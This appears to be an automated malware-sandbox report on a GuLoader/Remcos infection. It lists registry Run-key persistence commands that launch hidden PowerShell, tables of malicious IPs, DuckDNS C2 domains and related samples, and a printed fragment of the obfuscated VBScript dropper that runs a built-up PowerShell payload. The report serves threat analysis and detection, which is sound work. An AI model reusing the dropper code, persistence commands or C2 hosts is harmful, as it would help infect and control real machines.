                • Report creation exceeded maximum time and may have missing disassembly code information.
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size exceeded maximum capacity and may have missing disassembly code.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Report size getting too big, too many NtReadVirtualMemory calls found.
                TimeTypeDescription
                02:09:03API Interceptor210x Sleep call for process: powershell.exe modified
                02:09:20API Interceptor1x Sleep call for process: dllhost.exe modified
                02:10:09API Interceptor296475x Sleep call for process: wab.exe modified
                08:09:36AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Argumentlistens %Semicomic% -w 1 $Affektationernes=(Get-ItemProperty -Path 'HKCU:\Agenetic76\').Tautologiske178;%Semicomic% ($Affektationernes)
                08:09:45AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Argumentlistens %Semicomic% -w 1 $Affektationernes=(Get-ItemProperty -Path 'HKCU:\Agenetic76\').Tautologiske178;%Semicomic% ($Affektationernes)
                08:10:38AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run LZ0PTDW C:\Program Files (x86)\windows mail\wab.exe
                08:10:46AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run LZ0PTDW C:\Program Files (x86)\windows mail\wab.exe
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                178.215.236.110IMG-WAA546342024-05-16 45452355353525245 1.17.29 PMTonoplast.vbsGet hashmaliciousGuLoader, RemcosBrowse
                  MST-004875758845993858358838583853534353loadinzormuleringse.exeGet hashmaliciousRemcosBrowse
                    rSMKGKZ757385839500358358935775939058735Repoll.exeGet hashmaliciousGuLoader, RemcosBrowse
                      SKMFTTEHRAN665757754757758689949688445454Ordn.exeGet hashmaliciousGuLoader, RemcosBrowse
                        137.220.252.40ZAM#U00d3WIENIE_NR.2405073.exeGet hashmaliciousDBatLoader, FormBookBrowse
                        • www.387mfyr.sbs/8cgp/
                        Company profile.pif.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                        • www.387mfyr.sbs/wu8v/
                        NdYuOgHbM9.exeGet hashmaliciousFormBookBrowse
                        • www.387mfyr.sbs/wu8v/
                        SecuriteInfo.com.Win64.PWSX-gen.27230.12502.exeGet hashmaliciousFormBookBrowse
                        • www.387mfyr.sbs/wu8v/
                        COMPANY PROFILE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                        • www.387mfyr.sbs/wu8v/
                        BM-FM_NR.24040718PDF.exeGet hashmaliciousFormBook, GuLoaderBrowse
                        • www.387mfyr.sbs/8cgp/
                        37.235.104.9IMG-466573885783553Folketingsmedlemmers.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                        • www.led-svitidla.eu/abt9/
                        RFQ0240515.XLS.bat.exeGet hashmaliciousFormBookBrowse
                        • www.led-svitidla.eu/tkc9/
                        188.215.50.15IMG-466573885783553Folketingsmedlemmers.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                          IMG-35235235523525235252532535Selvfinansieret.vbsGet hashmaliciousGuLoaderBrowse
                            178.237.33.50temp2.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                            • geoplugin.net/json.gp
                            QUOTE-PDF.exeGet hashmaliciousRemcosBrowse
                            • geoplugin.net/json.gp
                            https://github.com/hmrc/claim-tax-refund/files/15487332/TaxrefundlistPDF.zipGet hashmaliciousRemcosBrowse
                            • geoplugin.net/json.gp
                            SWIFT DOZNAKA RADIJATOR-INZENJERING DOO EUR 19588,22 20240529142528.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                            • geoplugin.net/json.gp
                            shipping document.jsGet hashmaliciousDBatLoader, RemcosBrowse
                            • geoplugin.net/json.gp
                            Whatsapp-IMG-87383-0001.xlsGet hashmaliciousRemcosBrowse
                            • geoplugin.net/json.gp
                            ce780b54c89a5fe2c0fe7fa6ff246b00ca4e15ee84b80c4d6730f30f345912ed_dump.exeGet hashmaliciousRemcosBrowse
                            • geoplugin.net/json.gp
                            E-Advice-Outward Remittance AOBFTT29052024866750_PDF.cmdGet hashmaliciousDBatLoader, RemcosBrowse
                            • geoplugin.net/json.gp
                            DHL_Express_Shipment_Confirmation_Notification_904088477321.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                            • geoplugin.net/json.gp
                            DHL_Express_Shipment_Confirmation_Notification_904088477321.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                            • geoplugin.net/json.gp
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            jgbours284hawara02.duckdns.orgIMG-WAA546342024-05-16 45452355353525245 1.17.29 PMTonoplast.vbsGet hashmaliciousGuLoader, RemcosBrowse
                            • 178.215.236.110
                            MST-004875758845993858358838583853534353loadinzormuleringse.exeGet hashmaliciousRemcosBrowse
                            • 178.215.236.110
                            rSMKGKZ757385839500358358935775939058735Repoll.exeGet hashmaliciousGuLoader, RemcosBrowse
                            • 178.215.236.110
                            SKMFTTEHRAN665757754757758689949688445454Ordn.exeGet hashmaliciousGuLoader, RemcosBrowse
                            • 178.215.236.110
                            Teklif talebi BAKVENTA-BAKUUsurpationens.cmdGet hashmaliciousGuLoader, RemcosBrowse
                            • 45.88.90.110
                            PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.htaGet hashmaliciousGuLoader, RemcosBrowse
                            • 45.88.90.110
                            doc.batGet hashmaliciousGuLoader, RemcosBrowse
                            • 45.88.90.110
                            ramirex.roIMG-466573885783553Folketingsmedlemmers.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                            • 188.215.50.15
                            IMG-35235235523525235252532535Selvfinansieret.vbsGet hashmaliciousGuLoaderBrowse
                            • 188.215.50.15
                            geoplugin.nettemp2.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                            • 178.237.33.50
                            QUOTE-PDF.exeGet hashmaliciousRemcosBrowse
                            • 178.237.33.50
                            https://github.com/hmrc/claim-tax-refund/files/15487332/TaxrefundlistPDF.zipGet hashmaliciousRemcosBrowse
                            • 178.237.33.50
                            SWIFT DOZNAKA RADIJATOR-INZENJERING DOO EUR 19588,22 20240529142528.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                            • 178.237.33.50
                            shipping document.jsGet hashmaliciousDBatLoader, RemcosBrowse
                            • 178.237.33.50
                            Whatsapp-IMG-87383-0001.xlsGet hashmaliciousRemcosBrowse
                            • 178.237.33.50
                            ce780b54c89a5fe2c0fe7fa6ff246b00ca4e15ee84b80c4d6730f30f345912ed_dump.exeGet hashmaliciousRemcosBrowse
                            • 178.237.33.50
                            E-Advice-Outward Remittance AOBFTT29052024866750_PDF.cmdGet hashmaliciousDBatLoader, RemcosBrowse
                            • 178.237.33.50
                            DHL_Express_Shipment_Confirmation_Notification_904088477321.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                            • 178.237.33.50
                            DHL_Express_Shipment_Confirmation_Notification_904088477321.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                            • 178.237.33.50
                            www.387mfyr.sbsFactura 02297-23042024.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • 137.220.252.40
                            anebilledes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • 137.220.252.40
                            IMG-466573885783553Folketingsmedlemmers.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                            • 137.220.252.40
                            ZAM#U00d3WIENIE_NR.2405073.exeGet hashmaliciousDBatLoader, FormBookBrowse
                            • 137.220.252.40
                            Company profile.pif.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                            • 137.220.252.40
                            NdYuOgHbM9.exeGet hashmaliciousFormBookBrowse
                            • 137.220.252.40
                            SecuriteInfo.com.Win64.PWSX-gen.27230.12502.exeGet hashmaliciousFormBookBrowse
                            • 137.220.252.40
                            COMPANY PROFILE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                            • 137.220.252.40
                            DHL_ES567436735845755676678877988975877.vbsGet hashmaliciousFormBook, GuLoader, RemcosBrowse
                            • 137.220.252.40
                            BM-FM_NR.24040718PDF.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • 137.220.252.40
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            LVLT-10753USDue Invoice pdf.exeGet hashmaliciousAgentTesla, PureLog Stealer, XWormBrowse
                            • 178.215.236.251
                            bot.arm5-20240528-2109.elfGet hashmaliciousMirai, MoobotBrowse
                            • 168.215.38.24
                            6a7R9UXFMM.elfGet hashmaliciousMiraiBrowse
                            • 94.154.174.117
                            fZUVfiCmaP.elfGet hashmaliciousMiraiBrowse
                            • 147.207.148.212
                            Doc0781123608.exeGet hashmaliciousAgentTesla, PureLog Stealer, XWormBrowse
                            • 178.215.236.251
                            Stien.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                            • 94.154.172.166
                            SKXNyy0UdE.elfGet hashmaliciousUnknownBrowse
                            • 178.215.236.101
                            IMG-WAA546342024-05-16 45452355353525245 1.17.29 PMTonoplast.vbsGet hashmaliciousGuLoader, RemcosBrowse
                            • 178.215.236.110
                            CGemi3cruu.elfGet hashmaliciousMiraiBrowse
                            • 148.57.27.158
                            bnJSH0V4Je.elfGet hashmaliciousMiraiBrowse
                            • 168.215.26.45
                            COMBAHTONcombahtonGmbHDEhttps://www.yumpu.com/en/document/read/68712704/view-and-print-online-confidential-doc-98372-6-3-2Get hashmaliciousHTMLPhisherBrowse
                            • 45.153.241.110
                            https://f2677811-d05a-4238-803b-e963ee14674b.inwise.net/Page_5-27-2024_3Get hashmaliciousHTMLPhisherBrowse
                            • 45.153.242.162
                            ypSJ08slSB.exeGet hashmaliciousAsyncRATBrowse
                            • 194.59.31.74
                            OSE - PO & FCST - ___-LT24052303183991-01.exeGet hashmaliciousRemcosBrowse
                            • 194.59.31.54
                            https://url12.mailanyone.net/scanner?m=1s97Ju-0007cP-5W&d=4%7Cmail%2F90%2F1716228000%2F1s97Ju-0007cP-5W%7Cin12g%7C57e1b682%7C11949542%7C14589158%7C664B8FE646C773D5644A5A16205D613D&o=%2Fphti%3A%2Fitsc3e4rnc.1bu&s=WFgXHfph-aCfQ3HNg6dfjLZSkk4Get hashmaliciousUnknownBrowse
                            • 160.20.145.170
                            dhl_awb_shipping_invoice_21_05_2024_000000000000024.exeGet hashmaliciousGuLoader, RemcosBrowse
                            • 194.59.31.149
                            file.exeGet hashmaliciousSocks5SystemzBrowse
                            • 194.59.31.219
                            https://url12.mailanyone.net/scanner?m=1s97Wg-0007OG-5w&d=4%7Cmail%2F90%2F1716228600%2F1s97Wg-0007OG-5w%7Cin12e%7C57e1b682%7C11949542%7C14589158%7C664B92FE7E7733B9B01FA361DA6487AF&o=%2Fphta%3A%2Fstspgiexou.nrP.srxp%2FMvjV7dvygwS7x%2FizWOqqG&s=2zn5SGraXgtNWi1MOGGJ5ZmUbDQGet hashmaliciousUnknownBrowse
                            • 160.20.145.170
                            jXBjxhHQgR.exeGet hashmaliciousCMSBruteBrowse
                            • 45.141.57.69
                            email legit check.emlGet hashmaliciousHTMLPhisherBrowse
                            • 194.59.31.166
                            BCPL-SGBGPNETGlobalASNSGhttp://spshoesx.top/Get hashmaliciousUnknownBrowse
                            • 137.220.146.63
                            http://login.aeosaen.top/Get hashmaliciousUnknownBrowse
                            • 27.124.47.217
                            IMG-466573885783553Folketingsmedlemmers.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                            • 137.220.252.40
                            x64.nn.elfGet hashmaliciousMiraiBrowse
                            • 137.220.223.49
                            PDF89gh ReUrgent Quotepdf.exeGet hashmaliciousFormBookBrowse
                            • 1.32.254.242
                            Product Listsd#U0334r#U0334o#U0334w#U0334..exeGet hashmaliciousFormBookBrowse
                            • 1.32.254.242
                            https://aeno.co.jp.yc-zg.com/aeonGet hashmaliciousUnknownBrowse
                            • 137.220.217.132
                            https://aeno.co.jp.slksg.com/aeonGet hashmaliciousUnknownBrowse
                            • 137.220.217.132
                            https://aeno.co.jp.xianchui.net/aeonGet hashmaliciousUnknownBrowse
                            • 137.220.217.132
                            https://bituotools.com/Get hashmaliciousUnknownBrowse
                            • 118.107.57.6
                            SUPERNETWORK_CZIMG-466573885783553Folketingsmedlemmers.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                            • 37.235.104.9
                            RFQ0240515.XLS.bat.exeGet hashmaliciousFormBookBrowse
                            • 37.235.104.9
                            https://filetransfer.io/data-package/LGjfkuMP/downloadGet hashmaliciousUnknownBrowse
                            • 46.234.105.221
                            x607DB0i08.exeGet hashmaliciousPushdoBrowse
                            • 88.86.118.82
                            x7RlIzQDk1.exeGet hashmaliciousUnknownBrowse
                            • 88.86.118.82
                            EwK95WVtzI.exeGet hashmaliciousPushdoBrowse
                            • 88.86.118.82
                            https://26355.wexbo.com/files/other/pcm_company.pdfGet hashmaliciousHTMLPhisherBrowse
                            • 95.168.193.75
                            CX17SY6xF6.exeGet hashmaliciousPushdoBrowse
                            • 88.86.118.82
                            Planilhas.xlsx.com.exeGet hashmaliciousUnknownBrowse
                            • 46.234.108.120
                            ryidtyjrhGet hashmaliciousUnknownBrowse
                            • 88.86.109.239
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            3b5074b1b5d032e5620f69f9f700ff0eSOA APR-MAY 2024.exeGet hashmaliciousAgentTeslaBrowse
                            • 188.215.50.15
                            Swift Copy.exeGet hashmaliciousAgentTeslaBrowse
                            • 188.215.50.15
                            ajb5QcGVGK.exeGet hashmaliciousDCRatBrowse
                            • 188.215.50.15
                            Application.jarGet hashmaliciousUnknownBrowse
                            • 188.215.50.15
                            Application.jarGet hashmaliciousUnknownBrowse
                            • 188.215.50.15
                            http://nickcrossley.onlineGet hashmaliciousUnknownBrowse
                            • 188.215.50.15
                            ProductsInquiries#VN8399938.exeGet hashmaliciousUnknownBrowse
                            • 188.215.50.15
                            ProductsInquiries#VN8399938.exeGet hashmaliciousUnknownBrowse
                            • 188.215.50.15
                            http://sekij22.pages.dev/Get hashmaliciousUnknownBrowse
                            • 188.215.50.15
                            http://arabasiastarzzfcontest.pages.dev/Get hashmaliciousUnknownBrowse
                            • 188.215.50.15
                            37f463bf4616ecd445d4a1937da06e19SecuriteInfo.com.Win32.DropperX-gen.2332.10313.exeGet hashmaliciousLummaCBrowse
                            • 188.215.50.15
                            temp2.vbsGet hashmaliciousGuLoaderBrowse
                            • 188.215.50.15
                            temp2.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                            • 188.215.50.15
                            file.exeGet hashmaliciousVidarBrowse
                            • 188.215.50.15
                            Unspuriousness.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • 188.215.50.15
                            ffff6f6.msiGet hashmaliciousUnknownBrowse
                            • 188.215.50.15
                            detalle_transferencia_2024-05-13T064143.173 0200_3049280002017526_PDF.exeGet hashmaliciousGuLoaderBrowse
                            • 188.215.50.15
                            Kompagnonernes.exeGet hashmaliciousGuLoaderBrowse
                            • 188.215.50.15
                            Factura 02297-23042024.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • 188.215.50.15
                            anebilledes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • 188.215.50.15
                            No context
                            Process:C:\Program Files (x86)\Windows Mail\wab.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):963
                            Entropy (8bit):5.017637342004999
                            Encrypted:false
                            SSDEEP:12:tkluand6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkw7x:qluWdVauKyGX85jvXhNlT3/7AcV9Wro
                            MD5:AE4FB899AF4F8667F2D6BC92629493D6
                            SHA1:860CF64EA386F6EF62EE25A7DC8888014A638F4E
                            SHA-256:A8F0C5A72BA646EDA416B116DFCDC56C3C3BAE23680D59FF57292DD45D1F4F6D
                            SHA-512:39945A1C024D7DF88FFB6E59F94408C6853780D4F9E7A039BD38ED2C9567D6B8694CEE3AA45FAD410B2F81801FC9FA5AA73FE23206EED4E9D7133FA2B6B38BC3
                            Malicious:false
                            Preview:{. "geoplugin_request":"8.46.123.175",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:modified
                            Size (bytes):11608
                            Entropy (8bit):4.8908305915084105
                            Encrypted:false
                            SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9R:9rib4Z1VoGIpN6KQkj2qkjh4iUxsT6YP
                            MD5:DD89E182EEC1B964E2EEFE5F8889DCD7
                            SHA1:326A3754A1334C32056811411E0C5C96F8BFBBEE
                            SHA-256:383ABA2B62EA69A1AA28F0522BCFB0A19F82B15FCC047105B952950FF8B52C63
                            SHA-512:B9AFE64D8558860B0CB8BC0FA676008E74F983C4845895E5444DD776A42B584ECE0BB1612D8F97EE631B064F08CF5B2C7622D58A3EF8EF89D199F2ACAEFA8B52
                            Malicious:false
                            Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1412
                            Entropy (8bit):5.432884047112001
                            Encrypted:false
                            SSDEEP:24:35z1WSKco4KmZjKbmOIKod6emZ9tYs4RPQoUEJ0gt/NK3R8CiagUMEOsr:bWSU4xympjmZ9tz4RIoUl8NWR8CN/Osr
                            MD5:D0EA630B4B6FEA6C29DFD60AD83C38F9
                            SHA1:9EF69D0F56C592A2453DF10B2A56EFE7D156925E
                            SHA-256:8E374A57F84137E72B7D6F8A6F9D68A4C4D3CCF1BEA0B2147600992C8884F45B
                            SHA-512:AD2DCAE5027EBDCC9AE7B23F91777C8E88F8F4DC510D8DBD0514D17707F0168EDF274E93587AA130497990FCEE9F6FBAD360F0DC0040AAB45A84FD2CDE067F75
                            Malicious:false
                            Preview:@...e................................................@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                            Process:C:\Program Files (x86)\Windows Mail\wab.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):23279
                            Entropy (8bit):4.490790706855259
                            Encrypted:false
                            SSDEEP:192:fHVW7MVf7LLWZQxF9KFJLT26jSqtWiLPfEvF4QQT7X2SVIkVSUfZKB5xjOzv245i:fHg77tTah5T2zNXMHP+6I8iu5pVv
                            MD5:A472C1FAFA3F44CE68133628D501E66D
                            SHA1:635B1915F0C2B4718627CFB52ABC9A987DDA7794
                            SHA-256:26BA9CB14985A79E8F92CCE91824AADE3F878635BD48559376CB86CC814C8C2F
                            SHA-512:FAFE39F7A8DA3147EF071765A88ECEC2B2F29E2EB9A73B4A326B972BB5999A104E56067D93AF0A8905E30DCF12964DC4D6ADD5AF771B32D7580D14513A31A80A
                            Malicious:true
                            Preview:.. ......Function Benzantialdoxime(Farestierne)....Benzantialdoxime = ChrW(Farestierne)....End Function .... ..Skittling = 0.... ..Surfacing= array(71-1+0,69,77,59,72,73,62,59,66,66).... ....Ar6 = Standpatism .... ..Dim Brefrekvens.... ..for Distributary=0 to ubound(Surfacing).. .. ...Systembemrkninger = Systembemrkninger & Benzantialdoxime(Surfacing(Distributary)+10).. .. ..Next....Call Unriveting ..........Messingdr20 = Systembemrkninger & " " & Benzantialdoxime(34) & Ar6 & Benzantialdoxime(34)......Call CreateObject("Wscript.Shell").Run( Messingdr20,Skittling)........Function Unriveting ......Ar6 = Ar6 & "$Radi"..Ar6 = Ar6 & "osender"..Ar6 = Ar6 & "='Sub';"..Ar6 = Ar6 & "$Radios"..Ar6 = Ar6 & "ender+='"..Ar6 = Ar6 & "strin';"..Ar6 = Ar6 & "$Knnest "..Ar6 = Ar6 & "= 1;$Rad"..Ar6 = Ar6 & "iosender+"..Ar6 = Ar6 & "='g';Fu"..Ar6 = Ar6 & "nction "..Ar6 = Ar6 & "Beshout($"..Ar6 = Ar6 & "Soluren"..Ar6 = Ar6 & "es){$St"..Ar6 = Ar6 & "rejft"..Ar6 = Ar6 & "ogters=$S"..Ar6 = Ar6 & "olure".
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Program Files (x86)\Windows Mail\wab.exe
                            File Type:Extensible storage user DataBase, version 0x620, checksum 0x48a80eb4, page size 32768, DirtyShutdown, Windows version 10.0
                            Category:dropped
                            Size (bytes):15728640
                            Entropy (8bit):0.10104014649099108
                            Encrypted:false
                            SSDEEP:1536:2SB2jpSB2jFSjlK/sw/ZweshzbOlqVqNes3zbtzbheszO/ZklMes1:2a6aCUueqUW9A6d
                            MD5:E796721168B5A15288B11EA0CF3FEAD1
                            SHA1:370A6B25D747D53E95DC4E42C0CE76E8F9C85748
                            SHA-256:6D7692842AC335C0F73B9FB100338D6895F6160197337695DC188F1D616E7461
                            SHA-512:0740529F4959CD2C9354B304C75EF4C8EDBF70F0C8D48076EBA95A7FFF171D07ECF67ABFEBFF48C28CCD17949D3F26CC381B60179B567B864360C2D09D2A6F46
                            Malicious:false
